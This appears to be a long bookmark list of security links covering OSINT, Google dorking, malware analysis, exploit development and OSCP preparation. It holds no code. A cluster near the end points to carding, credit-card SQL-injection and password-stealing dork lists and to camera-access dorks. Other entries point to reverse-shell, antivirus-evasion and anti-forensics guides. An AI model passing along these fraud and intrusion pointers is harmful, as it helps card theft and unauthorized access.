Nmap for Beginner Network Reconnaissance: https://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss... -1001-A Guide For Google Hacking Database: https://www.hackgentips.com/google-hacking-database/ -1002-2019 Data Breaches - The Worst Breaches, So Far: https://www.identityforce.com/blog/2019-data-breaches -1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills: https://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills -1004-Google Hacking Master List : https://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408 -1005-Smart searching with googleDorking | Exposing the Invisible: https://exposingtheinvisible.org/guides/google-dorking/ -1006-Google Dorks 2019: https://korben.info/google-dorks-2019-liste.html -1007-Google Dorks List and how to use it for Good; https://edgy.app/google-dorks-list -1008-How to Use Google to Hack(Googledorks): https://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/ -1009-Using google as hacking tool: https://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht... -1010-#googledorks hashtag on Twitter: https://twitter.com/hashtag/googledorks -1011-Top Five Open Source Intelligence (OSINT) Tools: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/ -1012-What is open-source intelligence (OSINT)?: https://www.microfocus.com/en-us/what-is/open-source-intelligence-osint -1013-A Guide to Open Source Intelligence Gathering (OSINT): https://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c -1014-OSINT: How to find information on anyone: https://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56 -1015-What is OSINT? How can I make use of it?: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it -1016-OSINT Tools for the Dark Web: https://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/ -1017-A Guide to Open Source Intelligence (OSINT): https://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php -1018-An Introduction To Open Source Intelligence (OSINT): https://www.secjuice.com/introduction-to-open-source-intelligence-osint/ -1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive: https://www.aptive.co.uk/blog/tls-ssl-security-testing/ -1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]: https://www.exploit-db.com/ghdb/4262/?source=ghdbid -1021-cheat_sheets: http://zachgrace.com/cheat_sheets/ -1022-Intel SYSRET: https://pentestlab.blog/2017/06/14/intel-sysret -1023-Windows Preventive Maintenance Best Practices: http://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/ -1024-An Overview of Storage Devices: http://www.professormesser.com/?p=19367 -1025-An Overview of RAID: http://www.professormesser.com/?p=19373 -1026-How to Troubleshoot: http://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/ -1027-Mobile Device Security Troubleshooting: http://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/ -1028-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1029-Using Wireshark - Display Filter Expressions: https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/ -1030-Decrypting SSL/TLS traffic with Wireshark: https://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/ -1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.: https://onceupon.github.io/Bash-Oneliner/ -1032- Bash One-Liners Explained, Part I: Working with files : https://catonmat.net/bash-one-liners-explained-part-one -1033-Bash One-Liners Explained, Part IV: Working with history: https://catonmat.net/bash-one-liners-explained-part-four -1034-Useful bash one-liners : https://github.com/stephenturner/oneliners -1035-Some Random One-liner Linux Commands [Part 1]: https://www.ostechnix.com/random-one-liner-linux-commands-part-1/ -1036-The best terminal one-liners from and for smart admins + devs.: https://www.ssdnodes.com/tools/one-line-wise/ -1037-Shell one-liner: https://rosettacode.org/wiki/Shell_one-liner#Racket -1038-SSH Cheat Sheet: http://pentestmonkey.net/tag/ssh -1039-7000 Google Dork List: https://pastebin.com/raw/Tdvi8vgK -1040-GOOGLE HACKİNG DATABASE – GHDB: https://pastebin.com/raw/1ndqG7aq -1041-STEALING PASSWORD WITH GOOGLE HACK: https://pastebin.com/raw/x6BNZ7NN -1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework: http://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework -1043-Open Source database of android malware: www.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki -1044-big-list-of-naughty-strings: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt -1045-publicly available cap files: http://www.netresec.com/?page=PcapFiles -1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf -1047-Building a malware analysis toolkit: https://zeltser.com/build-malware-analysis-toolkit/ -1048-Netcat Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -1049-Packers and crypters: http://securityblog.gr/2950/detect-packers-cryptors-and-compilers/ -1050-Evading antivirus: http://www.blackhillsinfosec.com/?p=5094 -1051-cheat sheets and information,The Art of Hacking: https://github.com/The-Art-of-Hacking -1052-Error-based SQL injection: https://www.exploit-db.com/docs/37953.pdf -1053-XSS cheat sheet: https://www.veracode.com/security/xss -1054-Active Directory Enumeration with PowerShell: https://www.exploit-db.com/docs/46990 -1055-Buffer Overflows, C Programming, NSA GHIDRA and More: https://www.exploit-db.com/docs/47032 -1056-Analysis of CVE-2019-0708 (BlueKeep): https://www.exploit-db.com/docs/46947 -1057-Windows Privilege Escalations: https://www.exploit-db.com/docs/46131 -1058-The Ultimate Guide For Subdomain Takeover with Practical: https://www.exploit-db.com/docs/46415 -1059-File transfer skills in the red team post penetration test: https://www.exploit-db.com/docs/46515 -1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules: https://www.exploit-db.com/docs/46049 -1061-Flying under the radar: https://www.exploit-db.com/docs/45898 -1062-what is google hacking? and why it is useful ?and how you can learn how to use it: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1063-useful blogs for penetration testers: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1064-useful #BugBounty resources & links & tutorials & explanations & writeups :: https://twitter.com/cry__pto/status/1143965322233483265?s=20 -1065-Union- based SQL injection: http://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html -1066-Broken access control: https://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails -1067-Understanding firewall types and configurations: http://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls -1068-5 Kali Linux tricks that you may not know: https://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html -1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter: https://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html -1060-A Guide To Subdomain Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers -1061-Advanced Recon Automation (Subdomains) case 1: https://medium.com/p/9ffc4baebf70 -1062-Security testing for REST API with w3af: https://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------ -1062-The Lazy Hacker: https://securit.ie/blog/?p=86 -1063-Practical recon techniques for bug hunters & pen testers: https://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md -1064-A More Advanced Recon Automation #1 (Subdomains): https://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/ -1065-Expanding your scope (Recon automation #2): https://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/ -1066-RCE by uploading a web.config: https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -1067-Finding and exploiting Blind XSS: https://enciphers.com/finding-and-exploiting-blind-xss/ -1068-Google dorks list 2018: http://conzu.de/en/google-dork-liste-2018-conzu -1096-Out of Band Exploitation (OOB) CheatSheet: https://www.notsosecure.com/oob-exploitation-cheatsheet/ -1070-Metasploit Cheat Sheet: https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1071-Linux Post Exploitation Cheat Sheet : red-orbita.com/?p=8455 -1072-OSCP/Pen Testing Resources : https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1073-Out Of Band Exploitation (OOB) CheatSheet : https://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html -1074-HTML5 Security Cheatsheet: https://html5sec.org/ -1075-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/ -1076-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1076-Windows Post-Exploitation Command List: pentest.tonyng.net/windows-post-exploitation-command-list/ -1077-Transfer files (Post explotation) - CheatSheet https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/ -1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ -1079-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -1081-Transferring files from Kali to Windows (post exploitation) : https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit: https://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f... -1083-OSCP Goldmine (not clickbait): 0xc0ffee.io/blog/OSCP-Goldmine -1084-Privilege escalation: Linux : https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1085-Exploitation Tools Archives : https://pentesttools.net/category/exploitationtools/ -1086-From Local File Inclusion to Remote Code Execution - Part 1: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1 -1087-Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet: www.vulnerability-lab.com/resources/documents/587.txt -1089-Binary Exploitation: https://pwndevils.com/hacking/howtwohack.html 1090-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1091-Penetration Testing Tools Cheat Sheet : https://news.ycombinator.com/item?id=11977304 -1092-List of Metasploit Commands - Cheatsheet: https://thehacktoday.com/metasploit-commands/ -1093-A journey into Radare 2 – Part 2: Exploitation: https://www.megabeets.net/a-journey-into-radare-2-part-2/ -1094-Remote Code Evaluation (Execution) Vulnerability: https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/ -1095-Exploiting Python Code Injection in Web Applications: https://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat... -1096-Shells · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html -1097-MongoDB Injection cheat sheet Archives: https://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/ -1098-Basic Shellshock Exploitation: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ -1099-Wireshark Tutorial and Tactical Cheat Sheet : https://hackertarget.com/wireshark-tutorial-and-cheat-sheet/ -1100-Windows Command Line cheatsheet (part 2): https://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm... -1101-Detecting WMI exploitation: www.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation... 1102-Metasploit Cheat Sheet - Hacking Land : https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -1103-5 Practical Scenarios for XSS Attacks: https://pentest-tools.com/blog/xss-attacks-practical-scenarios/ -1104-Ultimate gdb cheat sheet: http://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/ -1105-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -1106-Reverse Engineering Cheat Sheet: https://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet -1107-Reverse Engineering For Malware Analysis: https://eforensicsmag.com/reverse_engi_cheatsheet/ -1108-Reverse-engineering Cheat Sheets : https://www.cheatography.com/tag/reverse-engineering/ -1109-Shortcuts for Understanding Malicious Scripts: https://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross -1110-WinDbg Malware Analysis Cheat Sheet : https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -1111-Cheat Sheet for Malware Analysis: https://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/ -1112-Tips for Reverse-Engineering Malicious Code : https://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet -1113-Cheatsheet for radare2 : https://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html -1114-Reverse Engineering Cheat Sheets: https://www.pinterest.com/pin/576390452300827323/ -1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links: https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed -1116-Malware Resources : https://www.professor.bike/malware-resources -1117-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1118-Getting cozy with exploit development: https://0x00sec.org/t/getting-cozy-with-exploit-development/5311 -1119-appsec - Web Security Cheatsheet : https://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list -1120-PEDA - Python Exploit Development Assistance For GDB: https://www.pinterest.ru/pin/789044797190775841/ -1121-Exploit Development Introduction (part 1) : https://www.cybrary.it/video/exploit-development-introduction-part-1/ -1122-Windows Exploit Development: A simple buffer overflow example: https://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a -1123-Exploit Development-Everything You Need to Know: https://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/ -1124-Exploit Development : https://0x00sec.org/c/exploit-development -1125-Exploit Development - Infosec Resources: https://resources.infosecinstitute.com/category/exploit-development/ -1126-Exploit Development : https://www.reddit.com/r/ExploitDev/ -1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1128-Exploit Development for Beginners: https://www.youtube.com/watch?v=tVDuuz60KKc -1129-Introduction to Exploit Development: https://www.fuzzysecurity.com/tutorials/expDev/1.html -1130-Exploit Development And Reverse Engineering: https://www.immunitysec.com/services/exploit-dev-reverse-engineering.html -1131-wireless forensics: https://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023 -1132-fake AP Detection: https://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866 -1133-In-Depth analysis of SamSam Ransomware: https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/ -1134-WannaCry ransomware: https://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis -1135-malware analysis: https://www.sans.org/reading-room/whitepapers/malicious/paper/2103 -1136-Metasploit's detailed communication and protocol writeup: https://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf -1137-Metasploit's SSL-generation module:: https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb -1139-Empire IOCs:: https://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315 -1140-excellent free training on glow analysis: http://opensecuritytraining.info/Flow.html -1141-NetFlow using Silk: https://tools.netsa.cert.org/silk/analysis-handbook.pdf -1142-Deep Packet Inspection: https://is.muni.cz/th/ql57c/dp-svoboda.pdf -1143-Detecting Behavioral Personas with OSINT and Datasploit: https://www.exploit-db.com/docs/45543 -1144-WordPress Penetration Testing using WPScan and MetaSploit: https://www.exploit-db.com/docs/45556 -1145-Bulk SQL Injection using Burp-to-SQLMap: https://www.exploit-db.com/docs/45428 -1146-XML External Entity Injection - Explanation and Exploitation: https://www.exploit-db.com/docs/45374 -1147- Web Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3): https://www.exploit-db.com/docs/45368 -1148-File Upload Restrictions Bypass: https://www.exploit-db.com/docs/45074 -1149-VLAN Hopping Attack: https://www.exploit-db.com/docs/45050 -1150-Jigsaw Ransomware Analysis using Volatility: https://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9 -1151-Ransomware early detection by the analysis of file sharing traffic: https://www.sciencedirect.com/science/article/pii/S108480451830300X -1152-Do You Think You Can Analyse Ransomware?: https://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529 -1153-Analysis of LockerGoga Ransomware : https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/ -1154-Detection and Forensic Analysis of Ransomware Attacks : https://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf -1155-Bad Rabbit Ransomware Technical Analysis: https://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/ -1156-NotPetya Ransomware analysis : https://safe-cyberdefense.com/notpetya-ransomware-analysis/ -1157-Identifying WannaCry on Your Server Using Logs: https://www.loggly.com/blog/identifying-wannacry-server-using-logs/ -1158-The past, present, and future of ransomware: https://www.itproportal.com/features/the-past-present-and-future-of-ransomware/ -1159-The dynamic analysis of WannaCry ransomware : https://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf -1160-Malware Analysis: Ransomware - SlideShare: https://www.slideshare.net/davidepiccardi/malware-analysis-ransomware -1161-Article: Anatomy of ransomware malware: detection, analysis : https://www.inderscience.com/info/inarticle.php?artid=84399 -1162-Tracking desktop ransomware payments : https://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf -1163-What is Ransomware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/ransomware -1164-Detect and Recover from Ransomware Attacks: https://www.indexengines.com/ransomware -1165-Wingbird rootkit analysis: https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html -1166-Windows Kernel Rootkits: Techniques and Analysis: https://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html -1167-Rootkit: What is a Rootkit and How to Detect It : https://www.veracode.com/security/rootkit -1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis: https://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/ -1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2: https://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/ -1170-ZeroAccess – an advanced kernel mode rootkit : https://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf -1171-Rootkit Analysis Identification Elimination: https://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination -1172-TDL3: The Rootkit of All Evil?: static1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf -1173-Avatar Rootkit: Dropper Analysis: https://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/ -1174-Sality rootkit analysis: https://www.prodefence.org/sality-rootkit-analysis/ -1175-RootKit Hook Analyzer: https://www.resplendence.com/hookanalyzer/ -1176-Behavioral Analysis of Rootkit Malware: https://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/ -1177-Malware Memory Analysis of the IVYL Linux Rootkit: https://apps.dtic.mil/docs/citations/AD1004349 -1178-Analysis of the KNARK rootkit : https://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit -1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim : https://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1 -1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process -1181-Code & Process Injection - Red Teaming Experiments: https://ired.team/offensive-security/code-injection-process-injection -1182-What Malware Authors Don't want you to know: https://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know -1183-.NET Process Injection: https://medium.com/@malcomvetter/net-process-injection-1a1af00359bc -1184-Memory Injection like a Boss : https://www.countercept.com/blog/memory-injection-like-a-boss/ -1185-Process injection - Malware style: https://www.slideshare.net/demeester1/process-injection -1186-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -1187-Unpacking Redaman Malware & Basics of Self-Injection Packers: https://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/ -1188-Code injection on macOS: https://knight.sc/malware/2019/03/15/code-injection-on-macos.html -1189-(Shell)Code Injection In Linux Userland : https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md -1190-Code injection on Windows using Python: https://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/ -1191-What is Reflective DLL Injection and how can be detected?: https://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/ -1192-Windows Process Injection: https://modexp.wordpress.com/2018/08/23/process-injection-propagate/ -1193-A+ cheat sheet: https://www.slideshare.net/abnmi/a-cheat-sheet -1194-A Bettercap Tutorial — From Installation to Mischief: https://danielmiessler.com/study/bettercap/ -1195-Debugging Malware with WinDbg: https://www.ixiacom.com/company/blog/debugging-malware-windbg -1195-Malware analysis, my own list of tools and resources: https://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/ -1196-Getting Started with Reverse Engineering: https://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html -1197-Debugging malicious windows scriptlets with Google chrome: https://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c -1198-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1199-Intro to Malware Analysis and Reverse Engineering: https://www.cybrary.it/course/malware-analysis/ -1200-Common Malware Persistence Mechanisms: https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/ -1201-Finding Registry Malware Persistence with RECmd: https://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd -1202-Windows Malware Persistence Mechanisms : https://www.swordshield.com/blog/windows-malware-persistence-mechanisms/ -1203- persistence techniques: https://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/ -1204- Persistence Mechanism - an overview | ScienceDirect Topics: https://www.sciencedirect.com/topics/computer-science/persistence-mechanism -1205-Malware analysis for Linux: https://www.sothis.tech/en/malware-analysis-for-linux-wirenet/ -1206-Linux Malware Persistence with Cron: https://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/ -1207-What is advanced persistent threat (APT)? : https://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT -1208-Malware Analysis, Part 1: Understanding Code Obfuscation : https://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/ -1209-Top 6 Advanced Obfuscation Techniques: https://sensorstechforum.com/advanced-obfuscation-techniques-malware/ -1210-Malware Obfuscation Techniques: https://dl.acm.org/citation.cfm?id=1908903 -1211-How Hackers Hide Their Malware: Advanced Obfuscation: https://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723 -1212-Malware obfuscation techniques: four simple examples: https://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/ -1213-Malware Monday: Obfuscation: https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0 -1213-Challenge of Malware Analysis: Malware obfuscation Techniques: https://www.ijiss.org/ijiss/index.php/ijiss/article/view/327 -1214-Static Malware Analysis - Infosec Resources: https://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/ -1215-Malware Basic Static Analysis: https://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725 -1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis: http://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/ -1217-What is Malware Analysis | Different Tools for Malware Analysis: https://blog.comodo.com/different-techniques-for-malware-analysis/ -1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning: https://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/ -1219-Limits of Static Analysis for Malware Detection: https://ieeexplore.ieee.org/document/4413008 -1220-Kernel mode versus user mode: https://blog.codinghorror.com/understanding-user-and-kernel-mode/ -1221-Understanding the ELF: https://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571 -1222-Windows Privilege Abuse: Auditing, Detection, and Defense: https://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e -1223-First steps to volatile memory analysis: https://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1 -1224-Maliciously Mobile: A Brief History of Mobile Malware: https://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8 -1225-Modern Binary Exploitation Writeups 0x01: https://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4 -1226-Exploit Development 01 — Terminology: https://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5 -1227-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1228-Best google hacking list on the net: https://pastebin.com/x5LVJu9T -1229-Google Hacking: https://pastebin.com/6nsVK5Xi -1230-OSCP links: https://pastebin.com/AiYV80uQ -1231-Pentesting 1 Information gathering: https://pastebin.com/qLitw9eT -1232-OSCP-Survival-Guide: https://pastebin.com/kdc6th08 -1233-Googledork: https://pastebin.com/qKwU37BK -1234-Exploit DB: https://pastebin.com/De4DNNKK -1235-Dorks: https://pastebin.com/cfVcqknA -1236-GOOGLE HACKİNG DATABASE: https://pastebin.com/1ndqG7aq -1237-Carding Dorks 2019: https://pastebin.com/Hqsxu6Nn -1238-17k Carding Dorks 2019: https://pastebin.com/fgdZxy74 -1239-CARDING DORKS 2019: https://pastebin.com/Y7KvzZqg -1240-sqli dork 2019: https://pastebin.com/8gdeLYvU -1241-Private Carding Dorks 2018: https://pastebin.com/F0KxkMMD -1242-20K dorks list fresh full carding 2018: https://pastebin.com/LgCh0NRJ -1243-8k Carding Dorks :): https://pastebin.com/2bjBPiEm -1244-8500 SQL DORKS: https://pastebin.com/yeREBFzp -1245-REAL CARDING DORKS: https://pastebin.com/0kMhA0Gb -1246-15k btc dorks: https://pastebin.com/zbbBXSfG -1247-Sqli dorks 2016-2017: https://pastebin.com/7TQiMj3A -1248-Here is kind of a tutorial on how to write google dorks.: https://pastebin.com/hZCXrAFK -1249-10k Private Fortnite Dorks: https://pastebin.com/SF9UmG1Y -1250-find login panel dorks: https://pastebin.com/9FGUPqZc -1251-Shell dorks: https://pastebin.com/iZBFQ5yp -1252-HQ PAID GAMING DORKS: https://pastebin.com/vNYnyW09 -1253-10K HQ Shopping DORKS: https://pastebin.com/HTP6rAt4 -1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold: https://pastebin.com/ttxAJbdW -1255-Gain access to unsecured IP cameras with these Google dorks: https://pastebin.com/93aPbwwE -1256-new fresh dorks: https://pastebin.com/ZjdxBbNB -1257-SQL DORKS FOR CC: https://pastebin.com/ZQTHwk2S -1258-Wordpress uploadify Dorks Priv8: https://pastebin.com/XAGmHVUr -1259-650 DORKS CC: https://pastebin.com/xZHARTyz -1260-3k Dorks Shopping: https://pastebin.com/e1XiNa8M -1261-DORKS 2018 : https://pastebin.com/YAZkPJ0j -1262-HQ FORTNITE DORKS LIST: https://pastebin.com/rzhiNad8 -1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING: https://pastebin.com/VwVpAvj2 -1264-Camera dorks: https://pastebin.com/fsARft2j -1265-Admin Login Dorks: https://pastebin.com/HWWNZCph -1266-sql gov dorks: https://pastebin.com/C8wqyNW8 -1267-10k hq gaming dorks: https://pastebin.com/cDLN8edi -1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! : https://pastebin.com/y59kK2h0 -1269-Dorks: https://pastebin.com/PKvZYMAa -1270-10k btc dorks: https://pastebin.com/vRnxvbCu -1271-7,000 Dorks for hacking into various sites: https://pastebin.com/n8JVQv3X -1272-List of information gathering search engines/tools etc: https://pastebin.com/GTX9X5tF -1273-FBOSINT: https://pastebin.com/5KqnFS0B -1274-Ultimate Penetration Testing: https://pastebin.com/4EEeEnXe -1275-massive list of information gathering search engines/tools : https://pastebin.com/GZ9TVxzh -1276-CEH Class: https://pastebin.com/JZdCHrN4 -1277-CEH/CHFI Bundle Study Group Sessions: https://pastebin.com/XTwksPK7 -1278-OSINT - Financial: https://pastebin.com/LtxkUi0Y -1279-Most Important Security Tools and Resources: https://pastebin.com/cGE8rG04 -1280-OSINT resources from inteltechniques.com: https://pastebin.com/Zbdz7wit -1281-Red Team Tips: https://pastebin.com/AZDBAr1m -1282-OSCP Notes by Ash: https://pastebin.com/wFWx3a7U -1283-OSCP Prep: https://pastebin.com/98JG5f2v -1284-OSCP Review/Cheat Sheet: https://pastebin.com/JMMM7t4f -1285-OSCP Prep class: https://pastebin.com/s59GPJrr -1286-Complete Anti-Forensics Guide: https://pastebin.com/6V6wZK0i -1287-The Linux Command Line Cheat Sheet: https://pastebin.com/PUtWDKX5 -1288-Command-Line Log Analysis: https://pastebin.com/WEDwpcz9 -1289-An A-Z Index of the Apple macOS command line (OS X): https://pastebin.com/RmPLQA5f -1290-San Diego Exploit Development 2018: https://pastebin.com/VfwhT8Yd -1291-Windows Exploit Development Megaprimer: https://pastebin.com/DvdEW4Az 